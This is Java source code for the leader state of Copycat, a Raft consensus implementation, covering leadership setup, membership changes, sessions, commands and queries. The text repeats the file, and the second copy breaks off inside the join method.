MAX_REQUEST_QUEUE_SIZE = 100; private final LeaderAppender appender; private Scheduled appendTimer; private long configuring; public LeaderState(ServerContext context) { super(context); this.appender = new LeaderAppender(this); } @Override public CopycatServer.State type() { return CopycatServer.State.LEADER; } @Override public synchronized CompletableFuture<ServerState> open() { // Reset state for the leader. takeLeadership(); // Append initial entries to the log, including an initial no-op entry and the server's configuration. appendInitialEntries(); // Commit the initial leader entries. commitInitialEntries(); return super.open() .thenRun(this::startAppendTimer) .thenApply(v -> this); } /** * Sets the current node as the cluster leader. */ private void takeLeadership() { context.setLeader(context.getCluster().member().id()); context.getClusterState().getRemoteMemberStates().forEach(m -> m.resetState(context.getLog())); } /** * Appends initial entries to the log to take leadership. */ private void appendInitialEntries() { final long term = context.getTerm(); // Append a no-op entry to reset session timeouts and commit entries from prior terms. try (InitializeEntry entry = context.getLog().create(InitializeEntry.class)) { entry.setTerm(term) .setTimestamp(appender.time()); Assert.state(context.getLog().append(entry) == appender.index(), "Initialize entry not appended at the start of the leader's term"); LOGGER.debug("{} - Appended {}", context.getCluster().member().address(), entry); } // Append a configuration entry to propagate the leader's cluster configuration. configure(context.getCluster().members()); } /** * Commits a no-op entry to the log, ensuring any entries from a previous term are committed. 
*/ private CompletableFuture<Void> commitInitialEntries() { // The Raft protocol dictates that leaders cannot commit entries from previous terms until // at least one entry from their current term has been stored on a majority of servers. Thus, // we force entries to be appended up to the leader's no-op entry. The LeaderAppender will ensure // that the commitIndex is not increased until the no-op entry (appender.index()) is committed. CompletableFuture<Void> future = new CompletableFuture<>(); appender.appendEntries(appender.index()).whenComplete((resultIndex, error) -> { context.checkThread(); if (isOpen()) { if (error == null) { context.getStateMachine().apply(resultIndex); future.complete(null); } else { context.setLeader(0); context.transition(CopycatServer.State.FOLLOWER); } } }); return future; } /** * Starts sending AppendEntries requests to all cluster members. */ private void startAppendTimer() { // Set a timer that will be used to periodically synchronize with other nodes // in the cluster. This timer acts as a heartbeat to ensure this node remains // the leader. LOGGER.debug("{} - Starting append timer", context.getCluster().member().address()); appendTimer = context.getThreadContext().schedule(Duration.ZERO, context.getHeartbeatInterval(), this::appendMembers); } /** * Sends AppendEntries requests to members of the cluster that haven't heard from the leader in a while. */ private void appendMembers() { context.checkThread(); if (isOpen()) { appender.appendEntries(); } } /** * Checks to determine whether any sessions have expired. * <p> * Copycat allows only leaders to explicitly unregister sessions due to expiration. This ensures * that sessions cannot be expired by lengthy election periods or other disruptions to time. * To do so, the leader periodically iterates through registered sessions and checks for sessions * that have been marked suspicious. The internal state machine marks sessions as suspicious when * keep alive entries are not committed for longer than the session timeout. Once the leader marks * a session as suspicious, it will log and replicate an {@link UnregisterEntry} to unregister the session. */ private void checkSessions() { long term = context.getTerm(); // Iterate through all currently registered sessions. for (ServerSessionContext session : context.getStateMachine().executor().context().sessions().sessions.values()) { // If the session isn't already being unregistered by this leader and a keep-alive entry hasn't // been committed for the session in some time, log and commit a new UnregisterEntry. if (session.state() == Session.State.UNSTABLE && !session.isUnregistering()) { LOGGER.debug("{} - Detected expired session: {}", context.getCluster().member().address(), session.id()); // Log the unregister entry, indicating that the session was explicitly unregistered by the leader. // This will result in state machine expire() methods being called when the entry is applied. final long index; try (UnregisterEntry entry = context.getLog().create(UnregisterEntry.class)) { entry.setTerm(term) .setSession(session.id()) .setExpired(true) .setTimestamp(System.currentTimeMillis()); index = context.getLog().append(entry); LOGGER.debug("{} - Appended {}", context.getCluster().member().address(), entry); } // Commit the unregister entry and apply it to the state machine. 
appender.appendEntries(index).whenComplete((result, error) -> { if (isOpen()) { context.getStateMachine().apply(index); } }); // Mark the session as being unregistered in order to ensure this leader doesn't attempt // to unregister it again. session.unregister(); } } } /** * Returns a boolean value indicating whether a configuration is currently being committed. * * @return Indicates whether a configuration is currently being committed. */ boolean configuring() { return configuring > 0; } /** * Returns a boolean value indicating whether the leader is still being initialized. * * @return Indicates whether the leader is still being initialized. */ boolean initializing() { // If the leader index is 0 or is greater than the commitIndex, do not allow configuration changes. // Configuration changes should not be allowed until the leader has committed a no-op entry. // See https://groups.google.com/forum/#!topic/raft-dev/t4xj6dJTP6E return appender.index() == 0 || context.getCommitIndex() < appender.index(); } /** * Commits the given configuration. */ protected CompletableFuture<Long> configure(Collection<Member> members) { final long index; try (ConfigurationEntry entry = context.getLog().create(ConfigurationEntry.class)) { entry.setTerm(context.getTerm()) .setTimestamp(System.currentTimeMillis()) .setMembers(members); index = context.getLog().append(entry); LOGGER.debug("{} - Appended {}", context.getCluster().member().address(), entry); // Store the index of the configuration entry in order to prevent other configurations from // being logged and committed concurrently. This is an important safety property of Raft. configuring = index; context.getClusterState().configure(new Configuration(entry.getIndex(), entry.getTerm(), entry.getTimestamp(), entry.getMembers())); } return appender.appendEntries(index).whenComplete((commitIndex, commitError) -> { context.checkThread(); if (isOpen()) { // Reset the configuration index to allow new configuration changes to be committed. configuring = 0; } }); } @Override public CompletableFuture<JoinResponse> join(final JoinRequest request) { context.checkThread(); logRequest(request); // If another configuration change is already under way, reject the configuration. // If the leader index is 0 or is greater than the commitIndex, reject the join requests. // Configuration changes should not be allowed until the leader has committed a no-op entry. // See https://groups.google.com/forum/#!topic/raft-dev/t4xj6dJTP6E if (configuring() || initializing()) { return CompletableFuture.completedFuture(logResponse(JoinResponse.builder() .withStatus(Response.Status.ERROR) .build())); } // If the member is already a known member of the cluster, complete the join successfully. if (context.getCluster().member(request.member().id()) != null) { return CompletableFuture.completedFuture(logResponse(JoinResponse.builder() .withStatus(Response.Status.OK) .withIndex(context.getClusterState().getConfiguration().index()) .withTerm(context.getClusterState().getConfiguration().term()) .withTime(context.getClusterState().getConfiguration().time()) .withMembers(context.getCluster().members()) .build())); } Member member = request.member(); // Add the joining member to the members list. If the joining member's type is ACTIVE, join the member in the // PROMOTABLE state to allow it to get caught up without impacting the quorum size. 
Collection<Member> members = context.getCluster().members(); members.add(new ServerMember(member.type(), member.serverAddress(), member.clientAddress(), Instant.now())); CompletableFuture<JoinResponse> future = new CompletableFuture<>(); configure(members).whenComplete((index, error) -> { context.checkThread(); if (isOpen()) { if (error == null) { future.complete(logResponse(JoinResponse.builder() .withStatus(Response.Status.OK) .withIndex(index) .withTerm(context.getClusterState().getConfiguration().term()) .withTime(context.getClusterState().getConfiguration().time()) .withMembers(members) .build())); } else { future.complete(logResponse(JoinResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } } }); return future; } @Override public CompletableFuture<ReconfigureResponse> reconfigure(final ReconfigureRequest request) { context.checkThread(); logRequest(request); // If another configuration change is already under way, reject the configuration. // If the leader index is 0 or is greater than the commitIndex, reject the promote requests. // Configuration changes should not be allowed until the leader has committed a no-op entry. // See https://groups.google.com/forum/#!topic/raft-dev/t4xj6dJTP6E if (configuring() || initializing()) { return CompletableFuture.completedFuture(logResponse(ReconfigureResponse.builder() .withStatus(Response.Status.ERROR) .build())); } // If the member is not a known member of the cluster, fail the promotion. ServerMember existingMember = context.getClusterState().member(request.member().id()); if (existingMember == null) { return CompletableFuture.completedFuture(logResponse(ReconfigureResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.UNKNOWN_SESSION_ERROR) .build())); } // If the configuration request index is less than the last known configuration index for // the leader, fail the request to ensure servers can't reconfigure an old configuration. if (request.index() > 0 && request.index() < context.getClusterState().getConfiguration().index() || request.term() != context.getClusterState().getConfiguration().term() && (existingMember.type() != request.member().type() || existingMember.status() != request.member().status())) { return CompletableFuture.completedFuture(logResponse(ReconfigureResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.CONFIGURATION_ERROR) .build())); } Member member = request.member(); // If the client address is being set or has changed, update the configuration. if (member.clientAddress() != null && (existingMember.clientAddress() == null || !existingMember.clientAddress().equals(member.clientAddress()))) { existingMember.update(member.clientAddress(), Instant.now()); } // Update the member type. 
existingMember.update(request.member().type(), Instant.now()); Collection<Member> members = context.getCluster().members(); CompletableFuture<ReconfigureResponse> future = new CompletableFuture<>(); configure(members).whenComplete((index, error) -> { context.checkThread(); if (isOpen()) { if (error == null) { future.complete(logResponse(ReconfigureResponse.builder() .withStatus(Response.Status.OK) .withIndex(index) .withTerm(context.getClusterState().getConfiguration().term()) .withTime(context.getClusterState().getConfiguration().time()) .withMembers(members) .build())); } else { future.complete(logResponse(ReconfigureResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } } }); return future; } @Override public CompletableFuture<LeaveResponse> leave(final LeaveRequest request) { context.checkThread(); logRequest(request); // If another configuration change is already under way, reject the configuration. // If the leader index is 0 or is greater than the commitIndex, reject the join requests. // Configuration changes should not be allowed until the leader has committed a no-op entry. // See https://groups.google.com/forum/#!topic/raft-dev/t4xj6dJTP6E if (configuring() || initializing()) { return CompletableFuture.completedFuture(logResponse(LeaveResponse.builder() .withStatus(Response.Status.ERROR) .build())); } // If the leaving member is not a known member of the cluster, complete the leave successfully. if (context.getCluster().member(request.member().id()) == null) { return CompletableFuture.completedFuture(logResponse(LeaveResponse.builder() .withStatus(Response.Status.OK) .withMembers(context.getCluster().members()) .build())); } Member member = request.member(); Collection<Member> members = context.getCluster().members(); members.remove(member); CompletableFuture<LeaveResponse> future = new CompletableFuture<>(); configure(members).whenComplete((index, error) -> { context.checkThread(); if (isOpen()) { if (error == null) { future.complete(logResponse(LeaveResponse.builder() .withStatus(Response.Status.OK) .withIndex(index) .withTerm(context.getClusterState().getConfiguration().term()) .withTime(context.getClusterState().getConfiguration().time()) .withMembers(members) .build())); } else { future.complete(logResponse(LeaveResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } } }); return future; } @Override public CompletableFuture<PollResponse> poll(final PollRequest request) { logRequest(request); // If a member sends a PollRequest to the leader, that indicates that it likely healed from // a network partition and may have had its status set to UNAVAILABLE by the leader. In order // to ensure heartbeats are immediately stored to the member, update its status if necessary. 
ServerMember member = context.getClusterState().getRemoteMember(request.candidate()); if (member != null && member.status() == Member.Status.UNAVAILABLE) { member.update(Member.Status.AVAILABLE, Instant.now()); configure(context.getCluster().members()); } return CompletableFuture.completedFuture(logResponse(PollResponse.builder() .withStatus(Response.Status.OK) .withTerm(context.getTerm()) .withAccepted(false) .build())); } @Override public CompletableFuture<VoteResponse> vote(final VoteRequest request) { if (updateTermAndLeader(request.term(), 0)) { LOGGER.debug("{} - Received greater term", context.getCluster().member().address()); context.transition(CopycatServer.State.FOLLOWER); return super.vote(request); } else { logRequest(request); return CompletableFuture.completedFuture(logResponse(VoteResponse.builder() .withStatus(Response.Status.OK) .withTerm(context.getTerm()) .withVoted(false) .build())); } } @Override public CompletableFuture<AppendResponse> append(final AppendRequest request) { context.checkThread(); if (updateTermAndLeader(request.term(), request.leader())) { CompletableFuture<AppendResponse> future = super.append(request); context.transition(CopycatServer.State.FOLLOWER); return future; } else if (request.term() < context.getTerm()) { logRequest(request); return CompletableFuture.completedFuture(logResponse(AppendResponse.builder() .withStatus(Response.Status.OK) .withTerm(context.getTerm()) .withSucceeded(false) .withLogIndex(context.getLog().lastIndex()) .build())); } else { context.setLeader(request.leader()).transition(CopycatServer.State.FOLLOWER); return super.append(request); } } @Override public CompletableFuture<CommandResponse> command(final CommandRequest request) { context.checkThread(); logRequest(request); // Get the client's server session. If the session doesn't exist, return an unknown session error. ServerSessionContext session = context.getStateMachine().executor().context().sessions().getSession(request.session()); if (session == null) { return CompletableFuture.completedFuture(logResponse(CommandResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.UNKNOWN_SESSION_ERROR) .build())); } ComposableFuture<CommandResponse> future = new ComposableFuture<>(); sequenceCommand(request, session, future); return future.thenApply(this::logResponse); } /** * Sequences the given command to the log. */ private void sequenceCommand(CommandRequest request, ServerSessionContext session, CompletableFuture<CommandResponse> future) { // If the command is LINEARIZABLE and the session's current sequence number is less then one prior to the request // sequence number, queue this request for handling later. We want to handle command requests in the order in which // they were sent by the client. Note that it's possible for the session sequence number to be greater than the request // sequence number. In that case, it's likely that the command was submitted more than once to the // cluster, and the command will be deduplicated once applied to the state machine. if (request.sequence() > session.nextRequestSequence()) { // If the request sequence number is more than 1k requests above the last sequenced request, reject the request. // The client should resubmit a request that fails with a COMMAND_ERROR. 
if (request.sequence() - session.getRequestSequence() > MAX_REQUEST_QUEUE_SIZE) { future.complete(CommandResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.COMMAND_ERROR) .build()); } // Register the request in the request queue if it's not too far ahead of the current sequence number. else { session.registerRequest(request.sequence(), () -> applyCommand(request, session, future)); } } else { applyCommand(request, session, future); } } /** * Applies the given command to the log. */ private void applyCommand(CommandRequest request, ServerSessionContext session, CompletableFuture<CommandResponse> future) { final Command command = request.command(); final long term = context.getTerm(); final long timestamp = System.currentTimeMillis(); final long index; // Create a CommandEntry and append it to the log. try (CommandEntry entry = context.getLog().create(CommandEntry.class)) { entry.setTerm(term) .setSession(request.session()) .setTimestamp(timestamp) .setSequence(request.sequence()) .setCommand(command); index = context.getLog().append(entry); LOGGER.debug("{} - Appended {}", context.getCluster().member().address(), entry); } // Replicate the command to followers. appendCommand(index, future); // Set the last processed request for the session. This will cause sequential command callbacks to be executed. session.setRequestSequence(request.sequence()); } /** * Sends append requests for a command to followers. */ private void appendCommand(long index, CompletableFuture<CommandResponse> future) { appender.appendEntries(index).whenComplete((commitIndex, commitError) -> { context.checkThread(); if (isOpen()) { if (commitError == null) { applyCommand(index, future); } else { future.complete(CommandResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build()); } } }); } /** * Applies a command to the state machine. */ private void applyCommand(long index, CompletableFuture<CommandResponse> future) { context.getStateMachine().<ServerStateMachine.Result>apply(index).whenComplete((result, error) -> { if (isOpen()) { completeOperation(result, CommandResponse.builder(), error, future); } }); } @Override public CompletableFuture<QueryResponse> query(final QueryRequest request) { Query query = request.query(); final long timestamp = System.currentTimeMillis(); context.checkThread(); logRequest(request); QueryEntry entry = context.getLog().create(QueryEntry.class) .setIndex(request.index()) .setTerm(context.getTerm()) .setTimestamp(timestamp) .setSession(request.session()) .setSequence(request.sequence()) .setQuery(query); return query(entry).thenApply(this::logResponse); } /** * Applies the given query entry to the state machine according to the query's consistency level. */ private CompletableFuture<QueryResponse> query(QueryEntry entry) { Query.ConsistencyLevel consistency = entry.getQuery().consistency(); if (consistency == null) return queryLinearizable(entry); switch (consistency) { case SEQUENTIAL: return queryLocal(entry); case LINEARIZABLE_LEASE: return queryBoundedLinearizable(entry); case LINEARIZABLE: return queryLinearizable(entry); default: throw new IllegalStateException("unknown consistency level"); } } /** * Executes a bounded linearizable query. * <p> * Bounded linearizable queries succeed as long as this server remains the leader. This is possible * since the leader will step down in the event it fails to contact a majority of the cluster. 
*/ private CompletableFuture<QueryResponse> queryBoundedLinearizable(QueryEntry entry) { return sequenceAndApply(entry); } /** * Executes a linearizable query. * <p> * Linearizable queries are first sequenced with commands and then applied to the state machine. Once * applied, we verify the node's leadership prior to responding successfully to the query. */ private CompletableFuture<QueryResponse> queryLinearizable(QueryEntry entry) { return sequenceAndApply(entry) .thenCompose(response -> appender.appendEntries() .thenApply(index -> response) .exceptionally(error -> QueryResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.QUERY_ERROR) .build())); } /** * Sequences and applies the given query entry. */ private CompletableFuture<QueryResponse> sequenceAndApply(QueryEntry entry) { // Get the client's server session. If the session doesn't exist, return an unknown session error. ServerSessionContext session = context.getStateMachine().executor().context().sessions().getSession(entry.getSession()); if (session == null) { return CompletableFuture.completedFuture(logResponse(QueryResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.UNKNOWN_SESSION_ERROR) .build())); } CompletableFuture<QueryResponse> future = new CompletableFuture<>(); // If the query's sequence number is greater than the session's current sequence number, queue the request for // handling once the state machine is caught up. if (entry.getSequence() > session.getCommandSequence()) { session.registerSequenceQuery(entry.getSequence(), () -> applyQuery(entry, future)); } else { applyQuery(entry, future); } return future; } @Override public CompletableFuture<RegisterResponse> register(RegisterRequest request) { final long timestamp = System.currentTimeMillis(); final long index; // If the client submitted a session timeout, use the client's timeout, otherwise use the configured // default server session timeout. final long timeout; if (request.timeout() != 0) { timeout = request.timeout(); } else { timeout = context.getSessionTimeout().toMillis(); } context.checkThread(); logRequest(request); // The timeout is logged in the RegisterEntry to ensure that all nodes see a consistent timeout for the session. 
try (RegisterEntry entry = context.getLog().create(RegisterEntry.class)) { entry.setTerm(context.getTerm()) .setTimestamp(timestamp) .setClient(request.client()) .setTimeout(timeout); index = context.getLog().append(entry); LOGGER.debug("{} - Appended {}", context.getCluster().member().address(), entry); } CompletableFuture<RegisterResponse> future = new CompletableFuture<>(); appender.appendEntries(index).whenComplete((commitIndex, commitError) -> { context.checkThread(); if (isOpen()) { if (commitError == null) { context.getStateMachine().apply(index).whenComplete((sessionId, sessionError) -> { if (isOpen()) { if (sessionError == null) { future.complete(logResponse(RegisterResponse.builder() .withStatus(Response.Status.OK) .withSession((Long) sessionId) .withTimeout(timeout) .withLeader(context.getCluster().member().clientAddress()) .withMembers(context.getCluster().members().stream() .map(Member::clientAddress) .filter(m -> m != null) .collect(Collectors.toList())).build())); } else if (sessionError instanceof CompletionException && sessionError.getCause() instanceof CopycatException) { future.complete(logResponse(RegisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(((CopycatException) sessionError.getCause()).getType()) .build())); } else if (sessionError instanceof CopycatException) { future.complete(logResponse(RegisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(((CopycatException) sessionError).getType()) .build())); } else { future.complete(logResponse(RegisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } checkSessions(); } }); } else { future.complete(logResponse(RegisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } } }); return future; } @Override public CompletableFuture<ConnectResponse> connect(ConnectRequest request, Connection connection) { context.checkThread(); logRequest(request); // Associate the connection with the appropriate client. 
context.getStateMachine().executor().context().sessions().registerConnection(request.client(), connection); return CompletableFuture.completedFuture(ConnectResponse.builder() .withStatus(Response.Status.OK) .withLeader(context.getCluster().member().clientAddress()) .withMembers(context.getCluster().members().stream() .map(Member::clientAddress) .filter(m -> m != null) .collect(Collectors.toList())) .build()) .thenApply(this::logResponse); } @Override public CompletableFuture<KeepAliveResponse> keepAlive(KeepAliveRequest request) { final long timestamp = System.currentTimeMillis(); final long index; context.checkThread(); logRequest(request); try (KeepAliveEntry entry = context.getLog().create(KeepAliveEntry.class)) { entry.setTerm(context.getTerm()) .setSession(request.session()) .setCommandSequence(request.commandSequence()) .setEventIndex(request.eventIndex()) .setTimestamp(timestamp); index = context.getLog().append(entry); LOGGER.debug("{} - Appended {}", context.getCluster().member().address(), entry); } CompletableFuture<KeepAliveResponse> future = new CompletableFuture<>(); appender.appendEntries(index).whenComplete((commitIndex, commitError) -> { context.checkThread(); if (isOpen()) { if (commitError == null) { context.getStateMachine().apply(index).whenComplete((sessionResult, sessionError) -> { if (isOpen()) { if (sessionError == null) { future.complete(logResponse(KeepAliveResponse.builder() .withStatus(Response.Status.OK) .withLeader(context.getCluster().member().clientAddress()) .withMembers(context.getCluster().members().stream() .map(Member::clientAddress) .filter(m -> m != null) .collect(Collectors.toList())).build())); } else if (sessionError instanceof CompletionException && sessionError.getCause() instanceof CopycatException) { future.complete(logResponse(KeepAliveResponse.builder() .withStatus(Response.Status.ERROR) .withLeader(context.getCluster().member().clientAddress()) .withError(((CopycatException) sessionError.getCause()).getType()) .build())); } else if (sessionError instanceof CopycatException) { future.complete(logResponse(KeepAliveResponse.builder() .withStatus(Response.Status.ERROR) .withLeader(context.getCluster().member().clientAddress()) .withError(((CopycatException) sessionError).getType()) .build())); } else { future.complete(logResponse(KeepAliveResponse.builder() .withStatus(Response.Status.ERROR) .withLeader(context.getCluster().member().clientAddress()) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } checkSessions(); } }); } else { future.complete(logResponse(KeepAliveResponse.builder() .withStatus(Response.Status.ERROR) .withLeader(context.getCluster().member().clientAddress()) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } } }); return future; } @Override public CompletableFuture<UnregisterResponse> unregister(UnregisterRequest request) { final long timestamp = System.currentTimeMillis(); final long index; context.checkThread(); logRequest(request); try (UnregisterEntry entry = context.getLog().create(UnregisterEntry.class)) { entry.setTerm(context.getTerm()) .setSession(request.session()) .setExpired(false) .setTimestamp(timestamp); index = context.getLog().append(entry); LOGGER.debug("{} - Appended {}", context.getCluster().member().address(), entry); } CompletableFuture<UnregisterResponse> future = new CompletableFuture<>(); appender.appendEntries(index).whenComplete((commitIndex, commitError) -> { context.checkThread(); if (isOpen()) { if (commitError == null) { 
context.getStateMachine().apply(index).whenComplete((unregisterResult, unregisterError) -> { if (isOpen()) { if (unregisterError == null) { future.complete(logResponse(UnregisterResponse.builder() .withStatus(Response.Status.OK) .build())); } else if (unregisterError instanceof CompletionException && unregisterError.getCause() instanceof CopycatException) { future.complete(logResponse(UnregisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(((CopycatException) unregisterError.getCause()).getType()) .build())); } else if (unregisterError instanceof CopycatException) { future.complete(logResponse(UnregisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(((CopycatException) unregisterError).getType()) .build())); } else { future.complete(logResponse(UnregisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } checkSessions(); } }); } else { future.complete(logResponse(UnregisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } } }); return future; } /** * Cancels the append timer. */ private void cancelAppendTimer() { if (appendTimer != null) { LOGGER.debug("{} - Cancelling append timer", context.getCluster().member().address()); appendTimer.cancel(); } } /** * Ensures the local server is not the leader. */ private void stepDown() { if (context.getLeader() != null && context.getLeader().equals(context.getCluster().member())) { context.setLeader(0); } } @Override public synchronized CompletableFuture<Void> close() { return super.close() .thenRun(appender::close) .thenRun(this::cancelAppendTimer) .thenRun(this::stepDown); } }
server/src/main/java/io/atomix/copycat/server/state/LeaderState.java
/* * Copyright 2015 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package io.atomix.copycat.server.state; import io.atomix.catalyst.concurrent.ComposableFuture; import io.atomix.catalyst.concurrent.Scheduled; import io.atomix.catalyst.transport.Connection; import io.atomix.catalyst.util.Assert; import io.atomix.copycat.Command; import io.atomix.copycat.Query; import io.atomix.copycat.error.CopycatError; import io.atomix.copycat.error.CopycatException; import io.atomix.copycat.protocol.*; import io.atomix.copycat.server.CopycatServer; import io.atomix.copycat.server.cluster.Member; import io.atomix.copycat.server.protocol.*; import io.atomix.copycat.server.storage.entry.*; import io.atomix.copycat.server.storage.system.Configuration; import io.atomix.copycat.session.Session; import java.time.Duration; import java.time.Instant; import java.util.Collection; import java.util.concurrent.CompletableFuture; import java.util.concurrent.CompletionException; import java.util.stream.Collectors; /** * Leader state. * * @author <a href="http://github.com/kuujo">Jordan Halterman</a> */ final class LeaderState extends ActiveState { // Max request queue size *per session* - necessary to limit the stack size private static final int MAX_REQUEST_QUEUE_SIZE = 100; private final LeaderAppender appender; private Scheduled appendTimer; private long configuring; public LeaderState(ServerContext context) { super(context); this.appender = new LeaderAppender(this); } @Override public CopycatServer.State type() { return CopycatServer.State.LEADER; } @Override public synchronized CompletableFuture<ServerState> open() { // Reset state for the leader. takeLeadership(); // Append initial entries to the log, including an initial no-op entry and the server's configuration. appendInitialEntries(); // Commit the initial leader entries. commitInitialEntries(); return super.open() .thenRun(this::startAppendTimer) .thenApply(v -> this); } /** * Sets the current node as the cluster leader. */ private void takeLeadership() { context.setLeader(context.getCluster().member().id()); context.getClusterState().getRemoteMemberStates().forEach(m -> m.resetState(context.getLog())); } /** * Appends initial entries to the log to take leadership. */ private void appendInitialEntries() { final long term = context.getTerm(); // Append a no-op entry to reset session timeouts and commit entries from prior terms. try (InitializeEntry entry = context.getLog().create(InitializeEntry.class)) { entry.setTerm(term) .setTimestamp(appender.time()); Assert.state(context.getLog().append(entry) == appender.index(), "Initialize entry not appended at the start of the leader's term"); LOGGER.debug("{} - Appended {}", context.getCluster().member().address(), entry); } // Append a configuration entry to propagate the leader's cluster configuration. configure(context.getCluster().members()); } /** * Commits a no-op entry to the log, ensuring any entries from a previous term are committed. 
*/ private CompletableFuture<Void> commitInitialEntries() { // The Raft protocol dictates that leaders cannot commit entries from previous terms until // at least one entry from their current term has been stored on a majority of servers. Thus, // we force entries to be appended up to the leader's no-op entry. The LeaderAppender will ensure // that the commitIndex is not increased until the no-op entry (appender.index()) is committed. CompletableFuture<Void> future = new CompletableFuture<>(); appender.appendEntries(appender.index()).whenComplete((resultIndex, error) -> { context.checkThread(); if (isOpen()) { if (error == null) { context.getStateMachine().apply(resultIndex); future.complete(null); } else { context.setLeader(0); context.transition(CopycatServer.State.FOLLOWER); } } }); return future; } /** * Starts sending AppendEntries requests to all cluster members. */ private void startAppendTimer() { // Set a timer that will be used to periodically synchronize with other nodes // in the cluster. This timer acts as a heartbeat to ensure this node remains // the leader. LOGGER.debug("{} - Starting append timer", context.getCluster().member().address()); appendTimer = context.getThreadContext().schedule(Duration.ZERO, context.getHeartbeatInterval(), this::appendMembers); } /** * Sends AppendEntries requests to members of the cluster that haven't heard from the leader in a while. */ private void appendMembers() { context.checkThread(); if (isOpen()) { appender.appendEntries(); } } /** * Checks to determine whether any sessions have expired. * <p> * Copycat allows only leaders to explicitly unregister sessions due to expiration. This ensures * that sessions cannot be expired by lengthy election periods or other disruptions to time. * To do so, the leader periodically iterates through registered sessions and checks for sessions * that have been marked suspicious. The internal state machine marks sessions as suspicious when * keep alive entries are not committed for longer than the session timeout. Once the leader marks * a session as suspicious, it will log and replicate an {@link UnregisterEntry} to unregister the session. */ private void checkSessions() { long term = context.getTerm(); // Iterate through all currently registered sessions. for (ServerSessionContext session : context.getStateMachine().executor().context().sessions().sessions.values()) { // If the session isn't already being unregistered by this leader and a keep-alive entry hasn't // been committed for the session in some time, log and commit a new UnregisterEntry. if (session.state() == Session.State.UNSTABLE && !session.isUnregistering()) { LOGGER.debug("{} - Detected expired session: {}", context.getCluster().member().address(), session.id()); // Log the unregister entry, indicating that the session was explicitly unregistered by the leader. // This will result in state machine expire() methods being called when the entry is applied. final long index; try (UnregisterEntry entry = context.getLog().create(UnregisterEntry.class)) { entry.setTerm(term) .setSession(session.id()) .setExpired(true) .setTimestamp(System.currentTimeMillis()); index = context.getLog().append(entry); LOGGER.debug("{} - Appended {}", context.getCluster().member().address(), entry); } // Commit the unregister entry and apply it to the state machine. 
appender.appendEntries(index).whenComplete((result, error) -> { if (isOpen()) { context.getStateMachine().apply(index); } }); // Mark the session as being unregistered in order to ensure this leader doesn't attempt // to unregister it again. session.unregister(); } } } /** * Returns a boolean value indicating whether a configuration is currently being committed. * * @return Indicates whether a configuration is currently being committed. */ boolean configuring() { return configuring > 0; } /** * Returns a boolean value indicating whether the leader is still being initialized. * * @return Indicates whether the leader is still being initialized. */ boolean initializing() { // If the leader index is 0 or is greater than the commitIndex, do not allow configuration changes. // Configuration changes should not be allowed until the leader has committed a no-op entry. // See https://groups.google.com/forum/#!topic/raft-dev/t4xj6dJTP6E return appender.index() == 0 || context.getCommitIndex() < appender.index(); } /** * Commits the given configuration. */ protected CompletableFuture<Long> configure(Collection<Member> members) { final long index; try (ConfigurationEntry entry = context.getLog().create(ConfigurationEntry.class)) { entry.setTerm(context.getTerm()) .setTimestamp(System.currentTimeMillis()) .setMembers(members); index = context.getLog().append(entry); LOGGER.debug("{} - Appended {}", context.getCluster().member().address(), entry); // Store the index of the configuration entry in order to prevent other configurations from // being logged and committed concurrently. This is an important safety property of Raft. configuring = index; context.getClusterState().configure(new Configuration(entry.getIndex(), entry.getTerm(), entry.getTimestamp(), entry.getMembers())); } return appender.appendEntries(index).whenComplete((commitIndex, commitError) -> { context.checkThread(); if (isOpen()) { // Reset the configuration index to allow new configuration changes to be committed. configuring = 0; } }); } @Override public CompletableFuture<JoinResponse> join(final JoinRequest request) { context.checkThread(); logRequest(request); // If another configuration change is already under way, reject the configuration. // If the leader index is 0 or is greater than the commitIndex, reject the join requests. // Configuration changes should not be allowed until the leader has committed a no-op entry. // See https://groups.google.com/forum/#!topic/raft-dev/t4xj6dJTP6E if (configuring() || initializing()) { return CompletableFuture.completedFuture(logResponse(JoinResponse.builder() .withStatus(Response.Status.ERROR) .build())); } // If the member is already a known member of the cluster, complete the join successfully. if (context.getCluster().member(request.member().id()) != null) { return CompletableFuture.completedFuture(logResponse(JoinResponse.builder() .withStatus(Response.Status.OK) .withIndex(context.getClusterState().getConfiguration().index()) .withTerm(context.getClusterState().getConfiguration().term()) .withTime(context.getClusterState().getConfiguration().time()) .withMembers(context.getCluster().members()) .build())); } Member member = request.member(); // Add the joining member to the members list. If the joining member's type is ACTIVE, join the member in the // PROMOTABLE state to allow it to get caught up without impacting the quorum size. 
